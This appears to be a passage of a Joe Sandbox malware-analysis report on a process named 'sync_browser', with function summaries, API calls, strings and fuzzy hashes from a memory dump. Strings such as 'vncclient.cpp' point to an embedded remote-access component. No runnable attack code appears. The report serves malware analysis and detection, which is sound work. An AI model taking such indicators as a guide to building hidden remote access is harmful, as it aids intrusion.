Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CurrentDirectoryFileModuleName
String ID: " -service
API String ID: 3981628254-877726483
Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
Instruction ID: b316bf1d2b8dbe0b95b2cb7d874dae09489213e0286a14b4b17916c6ebfe9e75
Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
Instruction Fuzzy Hash: 7231A2116086C182EB25A720A8153BDBBA0FF99B94FC44337DAAC536D5DF3CE514C724

Function 00007FF7D59E89E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59E8969
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E8974

Strings

B, xrefs: 00007FF7D59E8999

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
Instruction ID: 27426049234094771ae11d218994f41d016f26ecb9e1db14b2e1b21a45679318
Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
Instruction Fuzzy Hash: F1112E72A1978186E620AB55A44026DB6A0FB88FD8FD44232EF9D07B95CF3CD5408B15

Function 00007FF7D5943EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D5943F18
PlaySoundA.WINMM ref: 00007FF7D5943F85

Strings

ding_dong.wav, xrefs: 00007FF7D5943F59

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: FileModuleNamePlaySound
String ID: ding_dong.wav
API String ID: 3032721342-215479118
Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
Instruction ID: 2fad57b15090488ac688de6a8860764b07759bff642e73b289de594c7199c754
Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
Instruction Fuzzy Hash: 84114F2161869592E7249B35E85176AA6A0FF88B64FC04337EEAC876D4DF3CD111C720

Function 00007FF7D59441E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7D5944212

Part of subcall function 00007FF7D59E7DE8: _errno.LIBCMT ref: 00007FF7D59E7E00
Part of subcall function 00007FF7D59E7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7E0C

SendDlgItemMessageA.USER32 ref: 00007FF7D5944274

Strings

<, xrefs: 00007FF7D594423A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Item$MessageSend_errno_invalid_parameter_noinfo
String ID: <
API String ID: 2439412506-4251816714
Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
Instruction ID: 4d5feb8b831a55afa99573da4e4136008d014d651309140a5a0ab9098decadfd
Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
Instruction Fuzzy Hash: 97114922A1864186E7509B15F4107AEB660EBC8B48F945032EB8D07B59CF3CD956CB50

Function 00007FF7D59E8B14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59E8B4D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E8B58

Strings

I, xrefs: 00007FF7D59E8B8D

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: I
API String ID: 2959964966-3707901625
Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
Instruction ID: 8a09deb2859f3847de58758ffe47b467b2887eb128f746c79e3d891f4e63373d
Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
Instruction Fuzzy Hash: A511A072A0874086EB10AF52A54026DB7A4FB94FE4F984232EF9C07B95CF3CD5418B00

Function 00007FF7D594FF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF7D594FF3E
inet_ntoa.WS2_32 ref: 00007FF7D594FF48

Strings

<unavailable>, xrefs: 00007FF7D594FF55

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: getpeernameinet_ntoa
String ID: <unavailable>
API String ID: 1982201544-1096956887
Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
Instruction ID: f625af3128cf5c8fe8adba06257ecab741b266a46b7193c47514e72188d2d2e6
Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
Instruction Fuzzy Hash: 4D016D62A1968687EB50AB24E45526DB7A0FB88B88FC40432EE4E4B364DF3CD446CB10

Function 00007FF7D593DA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

OpenFileMappingA.KERNEL32 ref: 00007FF7D593DAA7
MapViewOfFile.KERNEL32 ref: 00007FF7D593DACD

Strings

{34F673E0-878F-11D5-B98A-57B0D07B8C7C}, xrefs: 00007FF7D593DA9B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$MappingOpenView
String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
API String ID: 3439327939-2897898322
Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
Instruction ID: e6a49667b5dd0443c2df61c9eb8fd2c19fcea8be42e8a9f9a49e57d283e9cdac
Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
Instruction Fuzzy Hash: 5C018E32518B9087E720DBA4E45066EB7A0FB88BA4FC50336DA9A07B98CF7CD050C710

Function 00007FF7D593D9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

OpenFileMappingA.KERNEL32 ref: 00007FF7D593DA07
MapViewOfFile.KERNEL32 ref: 00007FF7D593DA2D

Strings

{34F673E0-878F-11D5-B98A-00B0D07B8C7C}, xrefs: 00007FF7D593D9FB

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$MappingOpenView
String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
API String ID: 3439327939-3305976270
Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
Instruction ID: 780d4a159ff2d0c42af42053f91ac5c735a03eb239297c752e66d96fb66b3124
Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
Instruction Fuzzy Hash: 2C018B32509B94C6E720DB64E45166EF7A0FB84BA4FC94236DAAA03B98CF7CD450C760

Function 00007FF7D593A200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7D593A225
FreeLibrary.KERNEL32 ref: 00007FF7D593A265

Strings

DllGetVersion, xrefs: 00007FF7D593A219

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryProc
String ID: DllGetVersion
API String ID: 3013587201-2861820592
Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
Instruction ID: f2d8682bf0ef9f14839f1e066e1268958b4109081c2a113350d34c29c5a63a42
Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
Instruction Fuzzy Hash: 92011E2261C75187E7149B55B48003EB6A0FF88B98F84413AEA9E46B58DF7CD5548B20

Function 00007FF7D595F6F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 00007FF7D595F719
PostMessageA.USER32 ref: 00007FF7D595F765

Strings

WindowsScreenSaverClass, xrefs: 00007FF7D595F733

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ClassMessageNamePost
String ID: WindowsScreenSaverClass
API String ID: 650004062-352026012
Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
Instruction ID: a5976b96fe95337ed4ad12fc61bec6d599529618c3b7a24580a39a54626bf8e7
Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
Instruction Fuzzy Hash: 79012C31618A9582E771AB15F910BEAA390FB8CB84FC40132DE8C1BB58DE3CE1558B10

Function 00007FF7D593D8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 00007FF7D593D90B
GetLastError.KERNEL32 ref: 00007FF7D593D915

Strings

{34F673E0-878F-11D5-B98A-00B0D07B8C7C}, xrefs: 00007FF7D593D8EA

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateErrorFileLastMapping
String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
API String ID: 1790465270-3305976270
Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
Instruction ID: bdb66565c4080ceaf468d34028f5ce47f9f90b941ae13508a519cbec32f2b78a
Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
Instruction Fuzzy Hash: 8D0171225097C1C6E7608B28A41076AB7A0EB84778F948335EABA026E8DF7CC494C720

Function 00007FF7D59589E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationwindowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF7D5958A29
WaitForSingleObject.KERNEL32 ref: 00007FF7D5958A36

Strings

vncclient.cpp : client Kill() called, xrefs: 00007FF7D59589ED

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: MessageObjectSendSingleWait
String ID: vncclient.cpp : client Kill() called
API String ID: 353115698-1198714380
Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
Instruction ID: 29c1ab2fd109e5d30fe1653cefe6b91fb5784df9bbcbbf99290984bcd843f5e3
Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
Instruction Fuzzy Hash: FB017C3260498182EB58AF75E8457ADA761EF88F78FD84232CA3D076D9CF38D494C390

Function 00007FF7D5936760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,00007FF7D59361EF), ref: 00007FF7D59367A4
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7D59361EF), ref: 00007FF7D59367C1

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF7D593678B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
API String ID: 47109696-713323490
Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
Instruction ID: 1b7468fd0699a15d3085d8f9ee140c7896c6cf292f178da9efae86a512bb5ae4
Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
Instruction Fuzzy Hash: 54F0C821A1874182EB109B24E40465EE7B0FF95F98FD80036DE5D077A4DF79C084C714

Function 00007FF7D599CEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF7D599CF19
inet_ntoa.WS2_32 ref: 00007FF7D599CF23

Strings

<unavailable>, xrefs: 00007FF7D599CF2E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
